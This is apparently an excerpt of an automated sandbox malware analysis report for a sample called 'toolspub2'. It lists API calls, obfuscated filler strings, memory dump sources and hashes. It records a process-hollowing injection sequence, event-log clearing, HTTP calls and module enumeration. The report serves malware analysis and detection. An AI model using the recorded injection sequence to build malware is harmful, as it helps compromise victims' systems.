                                                                                                                                                              • GetConsoleAliasExesA.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429F9A
                                                                                                                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,siyitixupilidategisufit), ref: 00429FA7
                                                                                                                                                              • SetTapeParameters.KERNEL32(00000000,00000000,2B0ACA95), ref: 00429FB4
                                                                                                                                                              • CreateNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429FC2
                                                                                                                                                              • BuildCommDCBAndTimeoutsW.KERNEL32(cafepusij kodugamuravivo tovizefotulugohuduzukilehisama,549BF258,684C9EF0), ref: 00429FED
                                                                                                                                                              • VerSetConditionMask.KERNEL32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429FF7
                                                                                                                                                              • GetCurrencyFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0042A00A
                                                                                                                                                              • lstrcpyA.KERNEL32(?,Nux pirisumapiso,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A01D
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0042A024
                                                                                                                                                              Strings
                                                                                                                                                              • zitecihucepikigibecit, xrefs: 00429CD5
                                                                                                                                                              • fuwexorovuvividenev soyavewisiyunawibehiyaj hanuvimahanolitoneyuy suwopijow, xrefs: 0042A049
                                                                                                                                                              • wasop rojuxiw xaniloyaresozoburu ziviwu xaninemipajajogecuhurodeperino, xrefs: 0042A132
                                                                                                                                                              • kolewaxelufamakasukocenorabumoji, xrefs: 0042A5DD
                                                                                                                                                              • henanuzu genucubec, xrefs: 0042A239
                                                                                                                                                              • Maw livuhubesavidepepufufado, xrefs: 0042A0F7
                                                                                                                                                              • yinasefabode, xrefs: 0042A07C
                                                                                                                                                              • bulomiyonazewapolasokinohiyemuw nor, xrefs: 0042A5E8
                                                                                                                                                              • Rewayete perob vurarih cases zebutakizuvudij, xrefs: 0042A640
                                                                                                                                                              • zuwumoxucironevaxuy, xrefs: 0042A0C7
                                                                                                                                                              • bajebumiravovopayoc doxocipeviwuduzucorigi, xrefs: 0042A189
                                                                                                                                                              • vekemepozub, xrefs: 00429EC0
                                                                                                                                                              • zepodasa, xrefs: 00429E36
                                                                                                                                                              • kasujizevohowifeluwadovijafoh, xrefs: 0042A616
                                                                                                                                                              • becefepetewidobotu, xrefs: 0042A259
                                                                                                                                                              • fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc, xrefs: 00429CFB
                                                                                                                                                              • vawixinadokitu jevukayisodomekofitoyojaj lederiwacugegerizexemafeyoy, xrefs: 0042A0F2
                                                                                                                                                              • Nux pirisumapiso, xrefs: 0042A010
                                                                                                                                                              • dogocopanisewejipikexetocu xolojaxuzaxoriwe, xrefs: 0042A3AC
                                                                                                                                                              • siyitixupilidategisufit, xrefs: 00429FA0
                                                                                                                                                              • kucevukanic datosijacumedogoko buy lovud wafizonajexevu, xrefs: 0042A26C
                                                                                                                                                              • rigiwudocigilopecopisotojohomi, xrefs: 00429D8D
                                                                                                                                                              • lotoboxicevexolayuzegovivusoy, xrefs: 0042A571
                                                                                                                                                              • hos, xrefs: 0042A102
                                                                                                                                                              • cafepusij kodugamuravivo tovizefotulugohuduzukilehisama, xrefs: 00429FD4
                                                                                                                                                              • kotiremapaniveza hehuje faf, xrefs: 0042A321
                                                                                                                                                              • m~W , xrefs: 00429C40
                                                                                                                                                              • facomimimutesotuvij xeluzetako, xrefs: 0042A279
                                                                                                                                                              • wazamugepojizevelede hatusorotoputanefiguketob, xrefs: 0042A12D
                                                                                                                                                              • xicihucujihatiwomihazuy wusucehadebiwevizeroxoxelivu, xrefs: 0042A057
                                                                                                                                                              • juyelixaketulipir kubamafanoli roxikelupohuwupim sosizepawehilixirivohevufo, xrefs: 0042A0CF
                                                                                                                                                              • rawuxatofini dezedofuxucejowive, xrefs: 0042A061
                                                                                                                                                              • xumewukageholehi, xrefs: 0042A215
                                                                                                                                                              • gumanuwamopeborikocujobu talabojecuda fojirafepogafibujuyos tovagiwejirenawudivulipo dolikimenucipitagisato, xrefs: 0042A05C
                                                                                                                                                              • mujuxalalohigosafemeduwixi, xrefs: 00429F1C
                                                                                                                                                              • lacojaganomunuweniyob, xrefs: 0042A1FE
                                                                                                                                                              • yotasal, xrefs: 00429F2D
                                                                                                                                                              • susejitiy, xrefs: 00429F17
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Console$AliasCommInfoProcessThreadVolume_hread$BuildCharacterCreateDirectoryEnumExitFileFindInterlockedLocaleMountOutputParametersPointReadTimeouts$AcceptAliasesAllocAtomAttributesBuffCancelCaptionCharCodeCompareConditionConfigContextConvertCurrencyCurrentDateDecrementDeleteDragDrawEnvironmentExesFatalFiberFilesFormatFormatsFromGlobalHardHttpIdealIncrementInformationInputInstanceLengthLinkMaskNamedNextObjectOpenPagesPathPipePrivateProcessorProfileProxyShutdownStringStringsSystemTapeTempVersionWindowsWrite__putwlstrcpylstrlen
                                                                                                                                                              • String ID: Maw livuhubesavidepepufufado$Nux pirisumapiso$Rewayete perob vurarih cases zebutakizuvudij$bajebumiravovopayoc doxocipeviwuduzucorigi$becefepetewidobotu$bulomiyonazewapolasokinohiyemuw nor$cafepusij kodugamuravivo tovizefotulugohuduzukilehisama$dogocopanisewejipikexetocu xolojaxuzaxoriwe$facomimimutesotuvij xeluzetako$fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc$fuwexorovuvividenev soyavewisiyunawibehiyaj hanuvimahanolitoneyuy suwopijow$gumanuwamopeborikocujobu talabojecuda fojirafepogafibujuyos tovagiwejirenawudivulipo dolikimenucipitagisato$henanuzu genucubec$hos$juyelixaketulipir kubamafanoli roxikelupohuwupim sosizepawehilixirivohevufo$kasujizevohowifeluwadovijafoh$kolewaxelufamakasukocenorabumoji$kotiremapaniveza hehuje faf$kucevukanic datosijacumedogoko buy lovud wafizonajexevu$lacojaganomunuweniyob$lotoboxicevexolayuzegovivusoy$mujuxalalohigosafemeduwixi$m~W $rawuxatofini dezedofuxucejowive$rigiwudocigilopecopisotojohomi$siyitixupilidategisufit$susejitiy$vawixinadokitu jevukayisodomekofitoyojaj lederiwacugegerizexemafeyoy$vekemepozub$wasop rojuxiw xaniloyaresozoburu ziviwu xaninemipajajogecuhurodeperino$wazamugepojizevelede hatusorotoputanefiguketob$xicihucujihatiwomihazuy wusucehadebiwevizeroxoxelivu$xumewukageholehi$yinasefabode$yotasal$zepodasa$zitecihucepikigibecit$zuwumoxucironevaxuy
                                                                                                                                                              • API String ID: 3937935734-882632078
                                                                                                                                                              • Opcode ID: 892c94be4f6526847a0e7f5b2944e4a03e408c49b1e326f98f39eee5aaace2ed
                                                                                                                                                              • Instruction ID: d50f5054499fc35c18551cf594888c1d2b92a9efd51e71263a81381d60eec7bd
                                                                                                                                                              • Opcode Fuzzy Hash: 892c94be4f6526847a0e7f5b2944e4a03e408c49b1e326f98f39eee5aaace2ed
                                                                                                                                                              • Instruction Fuzzy Hash: 994220F1504344AFE314AFB0EEC8DAB77ACEB88345F405929F646A2171DA789C44CB79
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • InterlockedIncrement.KERNEL32(0705214E), ref: 0042A391
                                                                                                                                                              • GetCharWidthFloatA.GDI32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A397
                                                                                                                                                              • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 0042A39B
                                                                                                                                                              • GlobalUnfix.KERNEL32(78004678), ref: 0042A3A6
                                                                                                                                                              • OpenWaitableTimerA.KERNEL32(00000000,00000000,dogocopanisewejipikexetocu xolojaxuzaxoriwe), ref: 0042A3B3
                                                                                                                                                              • GlobalFlags.KERNEL32(00000000), ref: 0042A3BA
                                                                                                                                                              • LocalFlags.KERNEL32(00000000), ref: 0042A3C1
                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0042A40D
                                                                                                                                                              • DebugActiveProcess.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A410
                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000000,00000000), ref: 0042A415
                                                                                                                                                              • SleepEx.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A41D
                                                                                                                                                              • GetUserDefaultLangID.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A423
                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000000), ref: 0042A42C
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A42F
                                                                                                                                                              • InitiateSystemShutdownA.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 0042A43A
                                                                                                                                                              • AbortSystemShutdownW.ADVAPI32(00000000), ref: 0042A441
                                                                                                                                                              • WinHttpReadData.WINHTTP(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A44B
                                                                                                                                                              • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042A456
                                                                                                                                                              • WinHttpWriteData.WINHTTP(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A460
                                                                                                                                                              • RevertToSelf.ADVAPI32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A466
                                                                                                                                                              • LoadLibraryW.KERNELBASE(007B8830,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A4CB
                                                                                                                                                              • GetConsoleCursorInfo.KERNEL32(00000000,0705214E,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A555
                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A55B
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A563
                                                                                                                                                              • FindFirstFileW.KERNEL32(lotoboxicevexolayuzegovivusoy,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A576
                                                                                                                                                              • InterlockedDecrement.KERNEL32(0705214E), ref: 0042A581
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A588
                                                                                                                                                              • CreateActCtxW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A58F
                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 0042A596
                                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,?,00000000,2FDEAD79,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042A5AC
                                                                                                                                                              • GetNamedPipeHandleStateW.KERNEL32(00000000,73C5D315,2B0ACA95,460D02EE,3AFB68FE,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 0042A5D0
                                                                                                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 0042A5D7
                                                                                                                                                              • lstrlenA.KERNEL32(kolewaxelufamakasukocenorabumoji,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A5E2
                                                                                                                                                              • GetModuleHandleA.KERNEL32(bulomiyonazewapolasokinohiyemuw nor,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A5ED
                                                                                                                                                              • VerLanguageNameW.KERNEL32(00000000,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 0042A5FD
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A607
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(kasujizevohowifeluwadovijafoh,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 0042A61B
                                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000,00000000,00000000), ref: 0042A624
                                                                                                                                                              • SetTimeZoneInformation.KERNEL32(?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A632
                                                                                                                                                              • ActivateActCtx.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A63A
                                                                                                                                                              • DeleteVolumeMountPointA.KERNEL32(Rewayete perob vurarih cases zebutakizuvudij), ref: 0042A645
                                                                                                                                                              Strings
                                                                                                                                                              • bulomiyonazewapolasokinohiyemuw nor, xrefs: 0042A5E8
                                                                                                                                                              • Rewayete perob vurarih cases zebutakizuvudij, xrefs: 0042A640
                                                                                                                                                              • kasujizevohowifeluwadovijafoh, xrefs: 0042A616
                                                                                                                                                              • kolewaxelufamakasukocenorabumoji, xrefs: 0042A5DD
                                                                                                                                                              • dogocopanisewejipikexetocu xolojaxuzaxoriwe, xrefs: 0042A3AC
                                                                                                                                                              • lotoboxicevexolayuzegovivusoy, xrefs: 0042A571
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$ConsoleHandleHttpProcess$CreateDataEventFindFlagsInterlockedModuleOpenReadShutdownSystemWrite$AbortActivateActiveAffinityAtomCharClearCtrlCursorDebugDecrementDefaultDeleteEnvironmentExpandFileFirstFloatIncrementInfoInformationInitiateLangLanguageLibraryLoadLocalMaskMountNameNamedOutputPipePointPrivateProfileRevertSectionSelfSleepStateStringsTerminateTimeTimerUnfixUnlockUserVolumeWaitableWidthZone_lclose_llseeklstrlen
                                                                                                                                                              • String ID: Rewayete perob vurarih cases zebutakizuvudij$bulomiyonazewapolasokinohiyemuw nor$dogocopanisewejipikexetocu xolojaxuzaxoriwe$kasujizevohowifeluwadovijafoh$kolewaxelufamakasukocenorabumoji$lotoboxicevexolayuzegovivusoy
                                                                                                                                                              • API String ID: 679312455-3953531779
                                                                                                                                                              • Opcode ID: 3a48f9abfdcf7132f2051365ae9c73d24e08ba9f00dbc9a366e3cb540e71a8ae
                                                                                                                                                              • Instruction ID: edf7171a028adfb4a70e067252a9153ff2f49692f783330aac89689947b74cda
                                                                                                                                                              • Opcode Fuzzy Hash: 3a48f9abfdcf7132f2051365ae9c73d24e08ba9f00dbc9a366e3cb540e71a8ae
                                                                                                                                                              • Instruction Fuzzy Hash: 436133B1114244EFE304AFB0EEC8E6B37ADFB48345F449929F64696171DB798844CB3A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00830156
                                                                                                                                                              • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0083016C
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000), ref: 00830255
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00830270
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00830283
                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0083029F
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008302C8
                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008302E3
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00830304
                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0083032A
                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00830399
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008303BF
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 008303E1
                                                                                                                                                              • ResumeThread.KERNELBASE(00000000), ref: 008303ED
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00830412
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 93872480-0
                                                                                                                                                              • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                              • Instruction ID: 3a2e802ed73c16134e1daee72bc1c7d129dd60ad639d9c1231866f9388b61e95
                                                                                                                                                              • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                              • Instruction Fuzzy Hash: 06B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 132 958404-95841d 133 95841f-958421 132->133 134 958423 133->134 135 958428-958434 CreateToolhelp32Snapshot 133->135 134->135 136 958444-958451 Module32First 135->136 137 958436-95843c 135->137 138 958453-958454 call 9580c3 136->138 139 95845a-958462 136->139 137->136 142 95843e-958442 137->142 143 958459 138->143 142->133 142->136 143->139
                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0095842C
                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0095844C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction ID: cc9d42787af4ce532fc5227a6bb52c1f8d481d421c72f05562b50ca626b53710
                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction Fuzzy Hash: 7CF062312007126BD720BFBA988DB6F76ECAF49726F100528EE42A10D0DF70E8494B61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 94 830420-8304f8 96 8304fa 94->96 97 8304ff-83053c CreateWindowExA 94->97 98 8305aa-8305ad 96->98 99 830540-830558 PostMessageA 97->99 100 83053e 97->100 101 83055f-830563 99->101 100->98 101->98 102 830565-830579 101->102 102->98 104 83057b-830582 102->104 105 830584-830588 104->105 106 8305a8 104->106 105->106 107 83058a-830591 105->107 106->101 107->106 108 830593-830597 call 830110 107->108 110 83059c-8305a5 108->110 110->106
                                                                                                                                                              APIs
                                                                                                                                                              • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00830533
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                              • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                              • API String ID: 716092398-2341455598
                                                                                                                                                              • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                              • Instruction ID: c5bd65945d3bdff80a01f67cdecd1a2a4b8577322f02324cee46c1001b27c816
                                                                                                                                                              • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                              • Instruction Fuzzy Hash: 72511870D083C8DAEB11CBE8C859BDDBFB2AF51708F144058D5447F286C3BA5A58CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 111 40cc48-40cc57 GetEnvironmentStringsW 112 40cc59-40cc5c 111->112 113 40cc5d-40cc60 111->113 114 40cc72-40cc7a call 40a667 113->114 115 40cc62-40cc68 113->115 118 40cc7f-40cc84 114->118 115->115 116 40cc6a-40cc70 115->116 116->114 116->115 119 40cc93-40cc9e call 407930 118->119 120 40cc86-40cc92 FreeEnvironmentStringsW 118->120 119->120
                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00408650), ref: 0040CC4B
                                                                                                                                                              • __malloc_crt.LIBCMT ref: 0040CC7A
                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CC87
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 237123855-0
                                                                                                                                                              • Opcode ID: 3e204571bdbb0458f023648185286c56f3d3937ffe736747ee8f9931af26ec88
                                                                                                                                                              • Instruction ID: 050faceb3d5b3391a9c0513903d2e7c15e72734720457198117a3b5261d180e3
                                                                                                                                                              • Opcode Fuzzy Hash: 3e204571bdbb0458f023648185286c56f3d3937ffe736747ee8f9931af26ec88
                                                                                                                                                              • Instruction Fuzzy Hash: 27F0E977508110DAEA307B34FDC9C975228CAD231430A463BF449E3290F6388D8182A9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 123 8305b0-8305d5 124 8305dc-8305e0 123->124 125 8305e2-8305f5 GetFileAttributesA 124->125 126 83061e-830621 124->126 127 830613-83061c 125->127 128 8305f7-8305fe 125->128 127->124 128->127 129 830600-83060b call 830420 128->129 131 830610 129->131 131->127
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008305EC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID: apfHQ$o
                                                                                                                                                              • API String ID: 3188754299-2999369273
                                                                                                                                                              • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                              • Instruction ID: cfc67f789f4ca95c6ec559d63a83865c37f71a00fd29e8746d2f884d9c1e5a49
                                                                                                                                                              • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                              • Instruction Fuzzy Hash: 03011E70C0424CEADB14DBD8C5193AEBFB5AF91309F148499C4096B242D7B69B58CBA6
